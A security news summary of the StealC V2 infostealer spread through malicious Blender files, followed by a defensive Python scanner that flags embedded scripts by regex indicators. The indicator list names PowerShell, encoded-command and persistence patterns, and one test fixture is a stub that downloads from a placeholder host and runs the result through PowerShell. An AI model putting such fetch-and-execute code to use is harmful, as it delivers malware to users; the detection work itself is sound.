StealC V2 Malware Spread via Blender Files on 3D Sites
Cybersecurity firm Morphisec reported that the StealC V2 infostealer is being spread through malicious Blender files on 3D model marketplaces. The malware abuses Blender's ability to run Python scripts for automation and add-ons. The campaign, active for at least six months, involves planting malicious .blend files on platforms such as CGTrader. Users unknowingly download these files, which execute embedded Python scripts when opened in Blender. The attack chain begins with a tampered Rig_Ui.py script embedded inside the .blend file, which fetches a loader from a remote domain, downloading a PowerShell stage and ZIP archives containing Python-based stealers. The malware creates LNK files to establish persistence and uses Pyramid C2 channels to retrieve encrypted payloads. StealC V2 now targets more than 23 browsers, over 100 plugins, more than 15 desktop wallets, and a range of messaging, VPN, and mail clients.
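For triage, a defender mostly wants to know whether a downloaded .blend file carries embedded Python text blocks at all, and whether those scripts combine a download primitive with a process-execution primitive, which is the shape of the loader chain described above. The scanner below is an added example written for this page; it is not Morphisec's tooling or any Blender project code. It walks the .blend file-block structure (12-byte header, then 20- or 24-byte block headers depending on pointer size), counts Text (`TX`) datablocks, and runs a constructed set of indicator regexes over every block body, because a Text datablock's lines are stored in separate `DATA` blocks rather than in the `TX` block itself. The sample inputs, the indicator list, the verdict rule and the `EXAMPLE-PLACEHOLDER` host are all constructed for the example. Two caveats: Blender 3.0 and later write compressed files with zstd, which the standard library cannot decompress, so those must be decompressed first (older gzip-compressed files are handled); and an indicator hit is a review signal, not proof of malice, since a legitimate rig UI script also imports `bpy`.

```python
"""Heuristic triage scanner for .blend files carrying embedded Python (added example)."""
import gzip
import re
import struct

# Constructed indicator set. A hit is a triage signal, not proof of malice: legitimate
# rig UI scripts import bpy too, so the verdict rule requires network AND execution hits.
INDICATORS = {
    "network": re.compile(rb"\b(urllib|requests|http\.client|socket|ftplib)\b"),
    "process_exec": re.compile(rb"\b(subprocess|os\.system|os\.popen|os\.startfile)\b"),
    "powershell": re.compile(rb"powershell|-EncodedCommand|-enc\b|\bIEX\b", re.IGNORECASE),
    "decode_exec": re.compile(rb"\b(base64|marshal|exec|compile)\b"),
    "persistence": re.compile(rb"Startup|\.lnk\b|CreateShortcut|\\Run\b", re.IGNORECASE),
}
ZSTD_MAGIC = b"\x28\xb5\x2f\xfd"


def load_blend_bytes(data: bytes) -> bytes:
    """Return uncompressed .blend bytes; pre-3.0 Blender gzips, 3.0+ uses zstd (no stdlib support)."""
    if data[:2] == b"\x1f\x8b":
        return gzip.decompress(data)
    if data[:4] == ZSTD_MAGIC:
        raise ValueError("zstd-compressed .blend: decompress with the zstd tool first")
    return data


def iter_blocks(data: bytes):
    """Yield (code, body) for every file block, following the .blend block-header layout."""
    if data[:7] != b"BLENDER":
        raise ValueError("missing BLENDER magic")
    ptr = "Q" if data[7:8] == b"-" else "I"      # '-' = 64-bit pointers, '_' = 32-bit
    order = ">" if data[8:9] == b"V" else "<"    # 'V' = big-endian, 'v' = little-endian
    fmt = order + "4sI" + ptr + "II"             # code, size, old address, SDNA index, count
    hlen = struct.calcsize(fmt)
    pos = 12                                     # 12-byte file header, e.g. "BLENDER-v300"
    while pos + hlen <= len(data):
        code, size, _addr, _sdna, _count = struct.unpack_from(fmt, data, pos)
        yield code, data[pos + hlen: pos + hlen + size]
        if code == b"ENDB":
            break
        pos += hlen + size


def scan_blend(raw: bytes) -> dict:
    """Count embedded Text datablocks and collect indicator hits across all block bodies."""
    data = load_blend_bytes(raw)
    report = {"text_blocks": 0, "indicators": {}, "verdict": "clean"}
    for code, body in iter_blocks(data):
        if code.startswith(b"TX"):               # Text ID block; its lines live in DATA blocks
            report["text_blocks"] += 1
        for name, rx in INDICATORS.items():
            for m in rx.finditer(body):
                report["indicators"].setdefault(name, set()).add(m.group(0).decode("latin-1"))
    report["indicators"] = {k: sorted(v) for k, v in report["indicators"].items()}
    if report["text_blocks"] and {"network", "process_exec"} <= set(report["indicators"]):
        report["verdict"] = "suspicious: embedded text block with download + execution primitives"
    elif report["indicators"]:
        report["verdict"] = "review"
    return report


def build_sample_blend(*texts: bytes) -> bytes:
    """Construct a minimal 64-bit little-endian .blend skeleton (a test fixture, not loadable)."""
    def block(code: bytes, body: bytes) -> bytes:
        return struct.pack("<4sIQII", code, len(body), 0, 0, 1) + body
    out = b"BLENDER-v300"
    for t in texts:
        out += block(b"TX\x00\x00", b"\x00" * 16)   # stand-in for the Text ID struct
        out += block(b"DATA", t)                     # stand-in for the TextLine storage
    return out + block(b"ENDB", b"")


# Constructed samples: a plain rig panel, and a stub with the downloader-plus-PowerShell
# shape the report describes (placeholder host, no real payload).
BENIGN_RIG_UI = b"import bpy\nclass RigUI(bpy.types.Panel):\n    bl_label = 'Rig'\n"
SUSPECT_RIG_UI = (
    b"import bpy, urllib.request, subprocess\n"
    b"code = urllib.request.urlopen('http://EXAMPLE-PLACEHOLDER/loader').read()\n"
    b"subprocess.Popen(['powershell', '-EncodedCommand', code])\n"
)


def demo() -> dict:
    """Scan the constructed samples, including a gzip-wrapped copy of the suspect file."""
    return {
        "benign": scan_blend(build_sample_blend(BENIGN_RIG_UI)),
        "suspect": scan_blend(build_sample_blend(SUSPECT_RIG_UI)),
        "suspect_gz": scan_blend(gzip.compress(build_sample_blend(SUSPECT_RIG_UI))),
    }


if __name__ == "__main__":
    for name, rep in demo().items():
        print(name, "->", rep["verdict"], rep["indicators"])
```

Run against a real download with `scan_blend(open(path, "rb").read())`. Because the scan covers every block body rather than only `TX` blocks, it also catches script text stored in other datablocks; the cost is that any indicator word appearing in, say, an object name produces a "review" verdict, which is the intended bias for a triage tool.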